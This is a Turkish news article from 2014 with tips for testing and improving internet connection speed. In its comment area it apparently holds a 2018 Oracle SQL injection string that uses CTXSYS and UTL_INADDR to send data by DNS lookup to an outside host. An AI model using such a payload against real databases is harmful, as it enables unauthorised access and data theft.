İnternet hız testi

İnternet hızınızı test edin, düzenleyin! İnternetiniz ne kadar hızlı? Daha hızlı bir internet için ne yapabilirsiniz? İnternet hız testi hakkında herşey haberimizde...
12 Ağustos 2014 18:48
İnternet hız testi
Bilgisayarınızın geniş bant bağlantı hızının gerçekten de aldığınız paket kadar olduğundan emin olmak için en iyi yol iyi bir test yapmak.
 
İnternet hızınız farklı bir çok faktörden etkilenebilir, bunun sonucunda bant genişliğiniz kısıtlanabilir. İnternet hızınızı test ederken ise bazı noktalara dikkat etmeniz gerekiyor. İnternetinizi hızlandırmakta size yardımcı olacak bazı ipuçlarını da sizlerle paylaşacağız.
 
Doğru sonuçlar almak için yerel bir sunucuyla bağlantı kuran bir hız testini kullanmalısınız. Aksi halde veri uzun mesafeleri katetmek zorunda kalacağı için sonuçlar hatalı olabilir.
 
Speettest.net, size yakın olan bir test sunucusuna bağlanmanızı sağlıyor. Settings menüsünü açıp Preffered Server ayarını kullanarak tercih ettiğiniz sunucuyu belirleyin. Testi başlatmak içinse Begin test'e basın.
 
Daha kapsamlı bir test için MyConnection PC Lite'ı deneyebilirsiniz.
 
Şimdi muhtemelen hangi sonucun iyi hangi sonucun kötü olduğunu merak ediyorsunuz. Aldığınız gönderme / indirme sonuçları, ücret ödediğiniz hızın yüzde 30-50 altındaysa bunun kötü bir sonuç olduğunu düşünebilirsiniz. Bu durumu çözmek için internet servis sağlayınıza başvurmayı deneyin.
 
Çeviri: incehesap
409029
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
06 Şubat 2018, Salı 12:39
yerli malı yurdun malı :) https://hizinitestet.net
Bu haberler ilginizi çekebilir